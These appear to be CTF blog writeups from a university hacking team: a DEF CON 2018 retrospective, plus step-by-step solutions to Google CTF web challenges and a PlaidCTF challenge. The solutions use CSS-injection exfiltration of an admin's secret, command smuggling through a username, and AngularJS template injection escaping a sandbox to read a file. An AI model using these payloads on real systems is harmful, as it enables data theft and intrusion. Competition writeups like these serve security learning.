I can't say this enough, but thank you to the Order of the Overflow for all of the sacrifices they make in order for DEF CON CTF to be successful. In a similar vein, congratulations to all of the other teams who played this year. Coming to DEF CON is so much fun in part because it's an opportunity to see all of you and enjoy the greater CTF community. In particular, congratulations to both HITCON⚔Bfkinesis and Tea Deliverers, who played phenomenally this year. It's incredible to see just how many brilliant hackers there are in this community.

Final Thoughts

This writeup has gone far longer than I had intended it to, and I imagine not many people will make it this far. But I wanted to take this opportunity to pose a few questions for the community as we move into this new season.

  1. What is the purpose of CTF? Do we play it to make ourselves better hackers, to push the boundaries of what we can do, or simply for the love of the game?
  2. What's keeping people away from it, and what can we do about it? A couple of teams opted not to attend DEF CON this year, which is always sad to hear.
  3. What crazy things do you secretly hope that OOO does next year? How do they make it work well?

I'm always curious what people are thinking, so feel free to comment, write your own long blog post, or tweet me. Thanks!

Zach Wade is an alumnus of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Welcome to the New Order: A DEF CON 2018 Retrospective
Aug 15 2018

On August 12th, 2018, the Plaid Parliament of Pwning earned second place in DEF CON CTF, one of the most competitive hacking competitions in the world. Placing ahead of us this year were our colleagues on DEFKOR00T, marking their second such victory over the past four years. Although this year I cannot provide an account of how the winning team played, we still have many great stories to tell, and we learned a lot from DEF CON 2018.

A Brief Introduction

For each of the past three DEF CONs, I've provided a retrospective (2016 and 2017) on what the experience was like for our team, the PPP. I enjoy writing these and sharing my perspective on the competition, and I hope that you will join me for an in-depth look at one of the most exciting security competitions in the world.

Imposing Order

2018 marked the Order of the Overflow's first year as DEF CON CTF organizers. LegitBS (the group that ran the previous five competitions) was a hard act to follow, but the OOO had a rockstar team. Led by the ever-amusing Zardus, the OOO contains players from Shellphish, organizers of iCTF and Boston Key Party, professors, and long-time CTFers. Furthermore, they had accepted this new position on a promise of shaking things up a bit and trying something new. We had a ==few ideas about what this might be==, but even our vivid imaginations were not prepared for this new Order.

doublethink

On a bit more of a fun note, the KotH challenge doublethink challenged teams to write a single 4096-byte shellcode that could run on as many of 12 different architectures as possible. For reference, these architectures were

  • lgp-30
  • pdp-1
  • pdp-8
  • pdp-10
  • mix
  • ibm-1401
  • nova
  • risc-v
  • hexagon
  • mmix
  • clemency
  • One of: amd64, arm64, or mipsel

By the time the challenge was retired, our team was in third place with shellcode that ran on 8 different architectures (amd64, lgp30, mix, pdp1, pdp8, pdp10, clemency, and nova). We were blown away by Dragon Sector with 9, and by HITCON, who had achieved a whopping 11. However, as we later found out, both of those teams had found a bug in the problem that let them claim success for far more architectures than they actually supported. On the plus side, it was a ton of fun writing each of those shellcodes!

bew

The final problem we will discuss in depth is bew. Bew is the first "web"-challenge that I have ever seen at DEF CON finals. It initially presented itself as a web-assembly (WASM) reversing problem, although after about 15 minutes of reading through it, it became apparent that the WASM was there primarily to mask the fact that all input to the problem was being evalled. Since it was released only about an hour before the end of the day, most teams were content with using that eval to copy the flag onto a publicly accessible page where it could be read directly. In fact, even the teams who did not find the bug realized that they could troll this page and submit any flags they found.

The real issue with bew's design became evident the next morning. Having had all night to play around with it, teams quickly realized that they could use this entry point to establish a permanent backdoor on other teams' servers that also removed the main entrypoint. Unfortunately, since everyone realized this, the first round of the day was simply a race to see who could get their backdoor installed on as many people's systems as possible. PPP unfortunately lost this race, but got lucky insofar as whoever backdoored us did so in a way that logged everyone else's backdoors to a public place. This meant that we had the source code for several teams' (insecure!) backdoors and were able to use those to get flags from other teams.

Notes, Issues, and Requests

While DEF CON finals were a lot of fun, they were not without issue either. The OOO took on a huge task this year, and with twice as many teams there are twice as many points of failure. Before I begin discussing some of these problems, I want to commend the OOO for their transparency throughout the whole process, and their eager willingness to make things right. An attitude like that is far more valuable than perfect infrastructure, because it resonates in every aspect of the competition. With this in mind, let's briefly discuss a few of the issues with the competition, and how we hope to see them changed.

Infrastructure Problems

These are the easiest to discuss, because everyone knows that this is an impossibly hard problem, and no team ever gets it perfect. The only specific worth mentioning is that when one of these problems affected our ability to score for a substantial portion of time, there was not really any good recourse. This is not to suggest that the OOO had an option they chose not to take, but rather that, as a result of this error, there was no fair way to restore those points to us. This can be a frustrating situation for all involved, and hopefully in the future a better recovery method can be implemented.

Gameplay Errata

With regard to some of the decisions made for the competition itself, these provide for a lot more discussion. First, I would like to express how much I enjoyed the new King-of-the-Hill mode. It added some much needed variety to the competition that really helped it to feel fresh and fun. In a similar vein, several members of our patching team mentioned that the limited-byte patching method made their job harder, but a lot more fun. It meant that they had to do a lot more by hand, but it was an exciting challenge.

In contrast, some of the changes made our job a little less fun. For my part especially, the omission of packet captures removed a significant strategic element from the game. We use the network captures for a number of different things. One use is as an indicator of how we are being attacked. By seeing what transpires over the wire, we can determine bugs in our application, and figure out how to fix them and use them against other people. The organizers referred to this as "ripping exploits off the wire," but I think that this is a little unfair, because it requires one to understand the contents of the transaction and build off of what other teams already have. It is also worth saying that, as a result of removing this, the OOO exposed an API that directly told you if you were being attacked. This helped fill in the gap somewhat, but still left out a lot of information.

Similarly, the knowledge that other teams will have the full contents of what you send them in the traditional attack-defense format encourages teams to be clever about how they deploy their exploits. It no longer becomes a matter of find-exploit-pwn, but instead other questions come into play such as: "who do we exploit?", "which exploit do we use?", and "how can we hide our exploit?". The importance of these "metagame" elements is one of the most interesting aspects of attack-defense style CTFs. Without these, the contest becomes more similar to a standard Jeopardy competition, and loses some of the "real-world" feel.

Finally, the loss of consensus evaluation removed another fun, inter-team component to the game. Instead of having an exploit that either works or does not work, consensus evaluation gives teams a way to seek out errors in the patching process, and exploit those for points. Not to mention, everybody loves to show off their fancy backdoor!

These are, of course, the thoughts of an individual player on an individual team. I would be interested to hear from both other teams and organizers as to their opinions on the new decisions.

A Challenge Coin for your Thoughts

Although it was disappointing to not win this year, losses like these always provide rich insight into ways that we as individuals and as a team can improve.

Avoid Mental Lock-In

I personally fell into the trap of preparing for defense and defense alone. When we arrived and found out that nearly all of our defensive systems were made irrelevant, I never mentally recovered. Instead of responding to that with "ok, let me spend most of my time on XYZ instead," I began bouncing around other projects and problems working on them in short vignettes. This is not to say that I was totally useless, but had I been more focused in what I was working on, I could have contributed more to the team. That would have been possible had I prepared to work on aspects of the competition beyond just defense.

Organization is Always Useful

This may not be true for everyone, but oftentimes I think of organization as a luxury only for when I have a lot of time on my hands. In practice, this is a terrible mindset to be in, and there were a number of places where better organization could have helped us a lot. A prime example of this is that in working on two different problems, a team member found a critical bug but did not realize it. They made a mental note to come back to it, but it eventually slipped their mind and the bug was never investigated later. Having a good way to organize these thoughts and notes could have helped us significantly.

With that said, there were a number of places where we organized ourselves well. Our team captain did an excellent job of making sure that everyone was involved in some aspect of the competition, and that everyone had goals to work toward. This meant that we had to waste far fewer cycles coordinating among ourselves and syncing up with different teams.

You Cannot Predict the Future

Having spent so many hours preparing a useless tool for finals this year, I was quick to beat myself up over our loss. In some sense, it felt as though my own shortcoming in predicting what we would need cost us the game. Yet, when I revisit what I knew ahead of time, I realize that knowing what I did then, I still made the best decision I could. It was unfortunate, but I came to Vegas and lost the gamble. As long as I take the time to discuss what went wrong and what we can do better next time, it was all still worth it.

T-364 Days

While this may not be as exciting as a write-up from the winning team, I think that it is nonetheless valuable to see the competition from a slightly different perspective. I want to once again thank the Order of the Overflow for all of the hard work and sleepless nights they suffered through to bring us this competition. Furthermore, DEFKOR00T, HITCON, and all of the other teams played an awesome game and really pushed us. Congratulations again to DEFKOR00T, and I'm looking forward to seeing everyone in Vegas again next year!

Zach Wade is a student of computer science at Carnegie Mellon University. He is also a member of the PPP, CMU's competitive hacking team. You can find him at @zwad3
Google CTF 2018: /bin/cat chat
Jun 29 2018

Google CTF has come to a close, with a very narrow victory on our part. As we decompress and mull over a set of excellent problems, we will post a few writeups of the ones we solved. Here is a writeup for the web problem "Cat Chat."

Cataloguing the Challenge

Who doesn't love chatting about dogs! Apparently, the folks at Google CTF. In fact, they dislike it so much that they made a chat application where you can talk about literally anything else. They called it Cat Chat and it has a bit more depth than we might think.

Our first introduction to the problem is pretty simple. We're offered a full-window chat interface that introduces itself as Cat Chat. In addition, it lays out a few basic "rules" for using it. They are:

  • We can invite other members by sharing the URL
  • We cannot talk about dogs
  • We can change our name using the /name command
  • We can report others for talking about dogs

Finally, and most critically, the introduction also provides a link to the server code. This, plus the client's catchat.js will give us all that we need to break free of this dog-lovers' dystopia.

Categorisations

Before we start looking for bugs and exploits, let's break down what both the server and the client do. At 77 lines, the client code is incredibly easy to read through. Essentially, it opens a long-running Server-Sent Events (SSE) connection and uses that to get information about the chat. When a message is sent, it gets pushed along the event pipe (unless the message is a report, in which case a captcha is first invoked). In addition, the pipe can spit out a number of events that update the client in different ways. These are:

  • undefined: Does nothing
  • error: Logs an error and complains in the chat
  • name: Informs the chat of another member's name change
  • rename: Updates your name in the localStorage.
  • secret: Overwrites your current secret, then displays the new one hidden with CSS.
  • msg: Under normal circumstances, displays to the chat a message that has been received. However, this will also autosend "Hi" when you first connect.
  • ban: The most amusing event. When a client sees ban it compares its name in localStorage against the name of the person who was banned. If they are the same, then it gives itself a "banned" cookie and disconnects from the chat.

In addition to the events, there is also a function called cleanupRoomFullOfBadPeople. This has no entrypoint, so it can reasonably be considered an admin-only function. Indeed, its primary purpose is to periodically check whether anyone has used the word "dog", banning them if they have by fetching their username out of the post's HTML. Like the rest of the client code, conveniently, it is nice and simple. Now let us look at the server.

Surprisingly enough, the server is not substantially more complicated than the client. A large amount of its code is dedicated to managing the multiple connections and setting up the various SSE pipes. Although we spent a while looking at these parts of the code, there was nothing very interesting about them so we will ignore them from now on. The interesting pieces are in the CSP — which gets set for every room — and the message processing logic.

The CSP is suitably locked down, with the following permissions

default-src 'self'
style-src   'unsafe-inline' 'self'
script-src  'self' https://www.google.com/recaptcha/ https://www.gstatic.com/recaptcha/
frame-src   'self' https://www.google.com/recaptcha/

Nothing exceptionally interesting, although the locked-down script-src, in combination with no ability to upload files, suggests that our eventual exploit will likely not be JS based. Furthermore, the freedom of unsafe-inline for style-src implies that we will be using some variant of CSS injection.

Looking now at the message handling logic, we see that it first checks that the request is originating from the correct site. Otherwise, it will return a CSRF error. Then, if no command is being executed, it will send a broadcast message from the user to all other members of the chat. Finally, if the message starts with a slash followed by text, then we case on the text. The cases we support are:

  • /name: In which case we send that person a rename response, and broadcast a name event to everyone else.
  • /ban: In which case we first check for an admin, and then send a ban event to all members of the chat.
  • /secret: In which case we set the user's secret cookie and then send them a secret response.
  • /report: In which case we forward the information to a hidden admin.report command.

While each of these is interesting, nothing is obviously wrong with the server.

Catching Bugs

Now that we know approximately how the problem works, let's make a few observations. First, the admin is just a normal user that happens to have a special cookie set. Secondly, we almost certainly need to find a way to leak the admin's flag using CSS. Finally, we can probably ban the admin.

This last observation is not strictly relevant to the problem, but how could we resist the opportunity to ban them? Fortunately, it should be easy enough. Since every client sees the /ban event, if we set our own name to admin, then when the admin bans us their own client will match the name too and ban them right alongside us. Let's try!

Wait, what went wrong? Not only was the admin not banned, but neither were we! Well, remember how we described the ban check earlier? It looks at the HTML for the post and fetches the user's name out of it. Then, it bans that user. Unfortunately, when two users have the same name, all posts from either user are labeled as <shared_name> (you). Thus, when the admin went to ban me for talking about dogs, they instead tried to ban the user admin (you).

So now we're stuck. Forget about the CTF, we have to ban the admin! It's an affront to our very being that they remain unbannable. We should look more at the code.

Interestingly enough, when the server is parsing a command, it initially fetches the name of the command by using the regular expression /^\/[^ ]*/. This regex will match a slash followed by any number of characters that are not spaces, anchored to the start of the message. However, once it parses the command, it finds the argument for it by using a different regular expression (as in the case of ban): /\/ban (.+)/. This RegExp will only match the command followed by a non-zero number of characters, but the match can occur anywhere in the string.

This discrepancy is notable because the admin bans us using the simple templated string /ban ${name}. Since . does not match newlines, this means that if we start our name with a newline, we can embed another /ban command later in the expression. Our mean admin thought they could avoid us, but now we have a new trick. If we set our name to be "\n/ban admin", then when they try to ban us, they'll ban themselves instead!
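
We can sanity-check the mismatch with plain Node, using the two regular expressions quoted above and the message the admin's client would send for that name:

// The admin's client sends `/ban ${name}` for a user named "\n/ban admin".
const msg = '/ban \n/ban admin';

msg.match(/^\/[^ ]*/)[0];    // '/ban'  -> the command is parsed from the start
msg.match(/\/ban (.+)/)[1];  // 'admin' -> '.' skips our newline, so the argument
                             //            is pulled from our embedded command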

No! We thought we had them. What happened this time? It turns out that when the admin queries our username, they do so via the element's innerText property. Notice how our username rendered itself all on one line? This means that when the admin tries to get our name, the newline will be stripped and they will see our name as /ban admin. There is still hope, however. Since innerText returns the rendered form of the underlying HTML, perhaps if we can get the HTML to render the newline, then the ban will go through.

There may be multiple ways of going about this, but the first one that I can think of is to set the element to have the CSS property white-space: pre. Effectively, what this does is force the HTML to render all of the white space in the text. We can try this out locally and see that doing so indeed causes innerText to return our username with the newline included. Now all we need is a way to render arbitrary CSS on the admin's page.
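
For reference, the local check is about as simple as it gets; something like the following in a browser console (the span is a stand-in for a rendered chat message element):

const span = document.createElement('span');
span.textContent = '\n/ban admin';
document.body.appendChild(span);

console.log(JSON.stringify(span.innerText));  // "/ban admin"   -> newline collapsed
span.style.whiteSpace = 'pre';
console.log(JSON.stringify(span.innerText));  // "\n/ban admin" -> newline preserved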

Looking at the client code again, we find that after a ban, the client renders that user's name in red. It does so by making a CSS query using the attribute selector with our escaped name embedded

`<style>span[data-name^=${esc(data.name)}] { color: red; }</style>`

Fortunately for us, that esc function is incredibly weak. The only characters it replaces are < > " and '. As it turns out, none of those are needed to write valid CSS!
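
As a paraphrase of the idea (the exact replacement strings are beside the point, only which characters get touched):

// Sketch of the escaping: only <, >, ", and ' are rewritten, so newlines,
// braces, and brackets sail straight through into the injected style rule.
const esc = (s) => s.replace(/[<>"']/g, (c) => '&#' + c.charCodeAt(0) + ';');

esc('<img>');                        // '&#60;img&#62;'
esc('\n]{} #foo { color: red }');    // returned unchanged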

Finally, we have a real path to victory. If we set our name to be \n]{}\n #conversation span:first-child { white-space: pre }\n/ban admin, then the first time we get "banned", the admin will inject the following CSS into their active styles (reformatted):

span[data-name^=
] { }

#conversation span:first-child {
    white-space: pre
}

/ban admin

Despite the terrible syntax errors, CSS is incredibly forgiving and will still render all relevant spans as pre (note that we could use a simpler selector here, but then the result would be impossible to read). Now, if we get "banned" again, the admin will ban our username with the newlines embedded and end up banning themselves instead. Let's go get them!

Bask in that glorious ban! It feels so wonderful for the admin to finally get a taste of their own medicine. I hope you enjoyed this writeup, and I'd like to thank my team, my friends, and all of the...

Wait, what do you mean we still need to get the flag? Oh, huh. I suppose we do. Fortunately, our boondoggle has led us most of the way there.

Cater to the Masses

In order to get the flag, all we need to do is convince the admin to place their secret in the DOM, and then we can use our CSS injection to exfiltrate it.

Diving in, the first thing we need to do is get the admin to dump their secret onto the page. Realistically, a readthrough of the server code indicates that the only way to do this is to have them run the secret command. However, the only command we can force them to run is the /ban command. Fortunately for us, their server makes a classic blunder. Let's look at the command logic:

switch (msg.match(/^\/[^ ]*/)[0]) {
  case '/name':
    if (!(arg = msg.match(/\/name (.+)/))) break;
    response = {type: 'rename', name: arg[1]};
    broadcast(room, {type: 'name', name: arg[1], old: name});
  case '/ban':
    if (!(arg = msg.match(/\/ban (.+)/))) break;
    if (!req.admin) break;
    broadcast(room, {type: 'ban', name: arg[1]});
  case '/secret':
    if (!(arg = msg.match(/\/secret (.+)/))) break;
    res.setHeader('Set-Cookie', 'flag=' + arg[1] + '; Path=/; Max-Age=31536000');
    response = {type: 'secret'};
  case '/report':
    if (!(arg = msg.match(/\/report (.+)/))) break;
    var ip = req.headers['x-forwarded-for'];
    ip = ip ? ip.split(',')[0] : req.connection.remoteAddress;
    response = await admin.report(arg[1], ip, `https://${req.headers.host}/room/${room}/`);
}

Look at that! They use a switch statement with no breaks after the cases. This means that we can use the same newline technique as before to have them ban someone and then fall through and call /secret.

While we can be reasonably assured that this works, we're left with an issue. As soon as we call secret, we overwrite their flag cookie with one under our control. This seems problematic at first, but a quick glance at the Set-Cookie grammar of RFC 6265 reminds us that cookies can be defined for arbitrary domains. Thus, we can set our flag cookie to be bogus; Domain=google.com, which the browser will refuse to store for this site, and so we won't overwrite the admin's cookie. Instead, they will put their original cookie in the DOM.

Finally, all that we need to do is exfiltrate it. There was something odd in the server code that I neglected to mention earlier, namely that the endpoint used for sending messages is method agnostic. You can POST to it, or GET it, or maybe even DELETE it. Regardless, the ability to send messages via a GET request gives us everything else that we need.

For those not versed in classic CSS exfil, the traditional technique is to use a background image URL that only triggers on certain selectors. By checking whether the request landed, we can get a single bit of data from the target. Exempli gratia, we can embed the following CSS rule into our payload to know whether the admin's flag has an 'A' in it.

[data-secret*=A] { 
    background: url(https://cat-chat.web.ctfcompetition.com/room/<OUR_UID>/send?name=exfil&msg=A) 
}

This uses the attribute selector in CSS to test whether the current page has any element whose attribute data-secret contains an A. If it does, it makes a request that will print the message A from the user exfil.

To test our whole exploit thus far, we can check to see if the admin's flag contains the letter C. Since we expect it to start with CTF{, this should succeed. In order for this to work, we will set our name to

 fake_banned_user
/secret hi_google; Domain=google.com
end_injection_tag] { }
[data-secret*=C] {
    background: url(https://cat-chat.web.ctfcompetition.com/room/fb587ec9-6bff-4c4a-913b-852cfdb8effb/send?name=exfil&msg=C)
}
[begin_injection_tag

Trying this out, we get

Just as we expected, we get 'C' back from our exfiltrator.

Catastrophe

Now that we have a proof of concept working, this is the part where I would show you my exploit script for you to look at and admire. Unfortunately, I cannot as I don't have one. Instead what I have is a short name generator that we used while doing all of the exfiltration by hand.

There are a number of reasons why we ended up doing this, but the biggest one is that since we can't embed quotes into our CSS, we are severely limited in the characters we can use. Furthermore, even if an element matches multiple rules, it may only have a single background image, so each attempt can exfiltrate only one character. As such, our approach was to write a small shim that we could update as we went, leaking one character at a time going either forward or backward from what we had. This was further complicated by the fact that we could not use { in our guesses and could not start any of them with numerals. All told, it took about 15 queries before we were able to piece together the whole flag.

For reference, here is the shim

prefix   = "L0LC47S_43V3"
suffix   = ""
alphabet = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
numerals = "0123456789"
strings  = ""
strings  += alphabet + numerals

chrs = (strings)
    .split("")
    .map((letter) => 
        ` [data-secret*=${prefix}${letter}${suffix}]{ background: url(https://cat-chat.web.ctfcompetition.com/room/fb587ec9-6bff-4c4a-913b-852cfdb8effb/send?name=exfil&msg=${prefix}${letter}${suffix}) } `).join("\n")

localStorage.name = ` fake_banned_user
/secret hi_google; Domain=google.com
end_injection_tag] { }
${chrs}
[begin_injection_tag`

Trying it out on the final letter of the flag, we can see how it works:

Finally, we have our flag and no longer have to listen to the admin's hateful messages. Now go forth and always remember our good dog when you pwn.

Google CTF 2018: Injection Modèle
Jun 29 2018

Google CTF has come to a close, with a very narrow victory on our part. As we decompress and mull over a set of excellent problems, we will post a few writeups of the ones we solved. Here is a writeup for the web problem "Translate."

An Odd Sort of Translation

Upon visiting http://translate.ctfcompetition.com:1337/, the homepage of the Translate service, we are greeted with a service that claims to be a "Translation utility for technical terms in French and English." Although the front page is rather bare-bones, it immediately offers a way for us to engage with it, in the form of an input field. "What French word," it invites, "do you want to translate into English?" Although it might be tempting to make our first query " or 1=1; -- , or perhaps "><script>alert(1)</script><, a better use of our time might simply be to ask for one of the suggested prompts.

Submitting téléverser to the form causes it to disappear and be replaced with a helpful translation of the form "In french, téléverser is spelled upload." While I have some suspicions about the grammatical accuracy of that statement, it is helpful to see how the service acts when it's working. Now that we know that, it's time to poke at our target.

Poke and Prod

First, let's look at the capabilities of this site. As listed in the menu bar at the bottom, we may

  • Translate from French to English
  • Translate from English to French
  • Add words to our dictionary
  • Debug our translations
  • Reset the problem

Thus, we don't have much to start with, although we now have a few places to look.

In the problem description, we're given the hint "Client-side rendering, but not in a browser." Although you might have your suspicions going in, a quick glance at the client's code confirms them. The total number of source lines (including scripts and styles) is only 31. That, in combination with tags of the form <div ng-if="!userQuery">, ==suggests that this problem involves server-side AngularJS rendering.==

Now, any time you have a templating engine of any form running server-side, the first thing to look for is always a template injection. Whether it's Liquid templates, Handlebars, or now Angular, these setups often point in the same direction. Sure enough, upon clicking the "debug translations" link, we come across two suspicious looking "dictionaries". While each of these maps does act as a literal dictionary, they also have keys that appear to be part of the UI. In fact, each of them has the same (modulo language) key-value pair:

{ "in_lang_query_is_spelled":"In french, {{userQuery}} is spelled ." }

If this sounds familiar, that's because this is the prefix we saw when we queried téléverser earlier. It seems that this is being used as a template for our requests. Indeed, for those familiar with Angular's templating engine, the substring "{{userQuery}}" is an example of its embedded markup. Specifically, at run time that string will be replaced by a scoped variable called userQuery. Thus, we have found evidence of templating.

While this is a step in the right direction, it is far from sufficient. All that we have so far is a static string and no injection point of our own. Recall, now, the options we found initially. Since one of the options was to add new words to our dictionary, and this template string seems to, oddly enough, be in our dictionary, perhaps it is possible that we can overwrite their template string with one of our own.

Malicious Assistance

Now that we have an idea of how the site works, let's try adding our own words to the dictionary. However, instead of helpfully adding translations, we are going to say that the "Original Word" in_lang_query_is_spelled is translated as "I can do math: 1 + 1 = {{1+1}}". If our suspicions are correct, then upon querying téléverser again we should see a different response.

Sure enough, if we query again, we see the exciting output: "I can do math: 1 + 1 = 2". With this, we have template injection. At this point, we should be basically done.

Cold Hard Truth

In reality, a good CTF problem is never going to be that simple. Now that we have a template, we need to figure out exactly what we can do with it. The first thing that I tried was attempting to inspect process. This is a variable available in all Node applications that contains information about the execution process and a few methods for interacting with the outside world. However, initial attempts at doing this proved fruitless. Using {{ process }} as the query string returns nothing, and no obvious scopes were available that could access it (e.g. {{ angular.process }} or the like). Even more perplexing, logging {{ this }} gave us the single element $SCOPE, but logging that likewise returned the empty string. Finally, attempting to write statements instead of expressions gave ugly errors. For instance, using the query string {{ x = 1; for (i = 0; i < 10; i++) { x += i } }} caused an exception whose body had the word "Error" in it a whopping 5 times! At this point, it seems that we need to break out of our current context.

While I do not know much about Angular's templating language, it seems to be a parser that matches a subset of valid JavaScript and then evaluates it in an isolated context. In order to do anything useful, we need to be able to escape this limited scope. Through trial and error we see that it allows strings and expressions, so if we can get an eval call into the template, then we might have a fighting chance. Unfortunately (once again), attempting to find one through either {{ eval }} or {{ Function }} returns nothing but the empty string.

Hopefully at this point, you have an inkling of what's coming next. Think once again about what we just established — it allows strings and expressions. If this is true, then we should be able to access the string constructor through {{ 'a'.constructor }}, and then the string constructor's constructor (i.e. the function constructor) through {{ 'a'.constructor.constructor }}. Fingers crossed, we submit this and see that instead of the empty string, we're presented with a glorious function Function() { [native code] }; a reference to the Function constructor which is eval in everything but name.

Don't be Eval

Now that we have our eval, we can try again. Indeed, running {{ 'a'.constructor.constructor('return process') }} yields us

{
  "argv": [
    
  ],
  "title": "node",
  "version": "v8.11.3",
  "versions": {
    "http_parser": "2.8.0",
    ...
    "tz": "2017c"
  },
  "arch": "x64",
  "platform": "linux",
  "env": {
    
  },
  "pid": 174,
  "features": {
    "debug": false,
    ...
    "tls": true
  }
}

This means that we've successfully escaped our scope and have access to the underlying node VM.

Yet, our victory is short-lived. We notice quickly that we still do not have access to some of the things we would like, such as require or the angular object. Furthermore, the this object appears to only have the above process and an empty object called console. To figure out why this is, we can construct a more powerful query

'a'.constructor.constructor("let o = ''; for (x in this) o+=x+' '; return o")()

This prints out all of the keys in this, even the ones that JSON-ification leaves out. Much to our dismay, we see the following list: x VMError Buffer setTimeout setInterval setImmediate clearTimeout clearInterval clearImmediate process console. This list is small, certainly, but what is most discouraging is the presence of VMError. For those who are unfamiliar with it, this is an exception added by vm2, a tightly locked-down sandbox for running untrusted JS. Although I spent a while looking, I could not find any recent bugs in it.

Something Seems Off

At this point, we're still stymied. We have arbitrary JS access, but within a sandbox. Although we know we just need to read flag.txt from a file, we have no way of doing it. Clearly, we are still missing something and a brief reflection causes us to realize that when we logged {{ this }} earlier, we saw a reference to $SCOPE that was not present on the this we logged more recently. This indicates that there might be more properties available on the outside this that we can use. To find out what these are, we can augment the script from above by passing in an argument:

'a'.constructor.constructor("args", "let o = ''; for (x in args) o+=x+' '; return o")(this)

Using this, we can see all of the keys on the parent scope. Much to our joy, this this is the good this, with the properties: $$childTail $$childHead $$nextSibling $$watchers $$listeners $$listenerCount $$watchersCount $id $$ChildScope $parent $$prevSibling $$transcluded window i18n userQuery $$phase $root $$destroyed $$isolateBindings $$asyncQueue $$postDigestQueue $$applyAsyncQueue constructor $new $watch $watchGroup $watchCollection $digest $destroy $eval $evalAsync $$postDigest $apply $applyAsync $on $emit $broadcast.

Although I would love to talk about each and every one of these in an organized manner, at this point I've surely bored you to tears, and frankly I don't know about any of them. Upon seeing the reference to i18n, I used the above trick to enumerate all of its properties. Unlike its parent, all that resided on it were template and word. While there are approaches you can take to figure out more about what a black-box function does, we can opt for the simple one and try executing it on an input string.

For my part, that's exactly what I did, executing the template {{ i18n.template("foo") }}. In what was a huge surprise to me, as it may be for you, I was presented with the lovely error message: Couldn't load template: Error: ENOENT: no such file or directory, open './foo'. This means that it attempted to open foo, but wasn't able to because it didn't exist. However, we want to read flag.txt which surely does.

With a tremor in our hand and a flutter in our hearts, we upload the template {{ i18n.template("flag.txt") }}. Lo-and-behold, out pops the string: CTF{Televersez_vos_exploits_dans_mon_nuagiciel}.

No source was needed, not even a sandbox could stop us. Congratulations, you hacked Google Translate!

PlaidCTF 2018: I Heard You Like XSS
May 11 2018

In preparation for PlaidCTF 2018 I designed a two part web challenge called S-Exploitation (Paren Trap and the Wizard of OSS). Although I intended the first part to be an easier web challenge, and the second to be a tricky follow up, the former had only 16 solves and the latter just 2. Since I had a number of people ask me for clarification after the CTF, and to help other organizers to learn from it, I've described below how S-exploitation was designed and meant to be solved.

For those who don't care about the implementation, you can skip straight ahead to the solution.

Inspiration

A couple of months back I stumbled across this blog post. It's definitely worth a read, but the short version is that they were able to perform a privilege escalation in CouchDB because two parsers handled duplicate keys differently when decoding JSON strings. One parser (which implemented the spec correctly) could be used for authentication, and the other for privileges. Initially I had planned to make this problem a short recapitulation of that bug. Unfortunately for me (and fortunately for the rest of the world), every reasonable JSON parser I could find for Node implemented the spec properly. In a few cases, they had options to deviate from it, but that would have been too obvious to make for an interesting problem.
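
To make the parser-differential idea concrete, here is a sketch invented purely for illustration (it is not CouchDB's code, and the roles key is just an example): JSON.parse keeps the last occurrence of a duplicated key, while a naive hand-rolled parser might keep the first, so any security check split across the two can disagree.

const raw = '{"roles": [], "roles": ["_admin"]}';

// JSON.parse: the last occurrence of a duplicate key wins.
JSON.parse(raw).roles;                 // ["_admin"]

// A naive parser that records only the first value it sees for each key.
function naiveParse(text) {
  const obj = {};
  for (const [, key, value] of text.matchAll(/"([^"]+)":\s*(\[[^\]]*\])/g)) {
    if (!(key in obj)) obj[key] = JSON.parse(value);
  }
  return obj;
}
naiveParse(raw).roles;                 // []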

I considered briefly using the exact stack mentioned in that bug, but then had the idea to implement my own JSON parser. For the life of me, however, I could not think of a way to frame it in a way that would seem "reasonable." Instead I had the brilliant idea to use an ==S-expression== parser.

Fortunately for us, the native-sexp.node file is in /app. However, there is a catch. The blog serves the file as Latin1 because this is the only binary-preserving encoding that can also be used by express for rendering text. Unfortunately, this causes some problems when the file goes over the wire, since the response gets encoded as UTF-8. If you try to open up the resulting binary naively, you will get a whole lotta corruption. Fortunately, a simple script can restore it to its original state. An example decoder might be

let string = "...";  // the downloaded file's contents, read with the latin1 ("binary") encoding
// Re-interpreting those bytes as UTF-8 undoes the on-the-wire encoding; write the
// result back out with latin1 encoding to recover the original binary.
let decodedString = Buffer.from(string, "latin1").toString("utf-8");

Once you've decoded it, you can now open it up in your favorite disassembler, since it's just a fancy ELF.

As for reversing the binary, I won't go into much detail on this. It's relatively straightforward, and since I didn't remove symbols you don't have to work too hard. Once you poke around for a little bit, you notice that strings which are prefixed with @ will be eval'd. There's another catch, though. Most of the useful characters such as [,],(,),... are all disabled. It looks like all it can do is resolve numeric types and variables from the global scope.

Let's take a step back and remind ourselves of what we want to do. Since our end goal is performing an XSS on the sexp-updator... domain, we need to inject JavaScript somewhere on the page. Yet, the only places where JavaScript is allowed at all are on the home page (for ractive templating), and on the welcome page (for a JS redirect). Since we have no control over the home page, that means we need to inject into welcome. Fortunately for us, it inserts our name directly onto the page. Unfortunately for us, it can only run if it's using the appropriate nonce. Since the nonce is randomly generated, and it adds entropy on every page access, this seems impossible.

At this point, it's worth noting how the randomness works. Specifically, it's using a package called seedrandom that not only lets you dump entropy into the pool, but, as the name suggests, also lets you seed the random state. Moreover, it positions itself in the global scope, so Math.seedrandom is available from our S-Expression parser. This still seems problematic, since we have no parentheses and thus cannot call functions. Except, that's not quite true. JavaScript technically has two methods of calling functions. The most practical of these is functionName(arg1, arg2,...). The other, with the addition of template string literals, is to tag a template string, as in functionName`stringArg`. This only allows you to pass a single argument as a string array. While this isn't a tremendous amount of power, it does give us enough to call Math.seedrandom with an argument. With this, we can now predict the nonce after a login.
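
For anyone who has not seen it before, this is plain JavaScript rather than anything challenge-specific; tagging a template literal really does call the function without any parentheses:

// The tag function receives the literal's string pieces as a single array.
function shout(strings) {
  return strings[0].toUpperCase();
}

shout`zach`;   // 'ZACH' - roughly equivalent to shout(['zach'])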

However, we are not done yet. Even with all of this, we still have no way of forcing the admin to log in using this malicious account. In order to do this, we need another XSS as a launchpad. Looking over at SaMOA for a moment, we notice that on the /auth endpoint the user field is inserted into that page as HTML. This isn't sufficient, unfortunately. Simply injecting a script tag in here will not cause it to be executed. However, we notice that our content security policy contains strict-dynamic, so if we can convince ractive (the templating engine used by SaMOA) to insert our script into the page, it will be run.

It turns out this is pretty easy. See those flashing flags at the bottom of the page? Well, a quick glance at how that works shows that it's requesting the template "firstFlag". Looking at ractive's source, we see that it does this by doing a getElementById call and then ensuring that the element is a <script>. Well, this is easy enough; we'll just set our user to be

<script id="firstFlag">
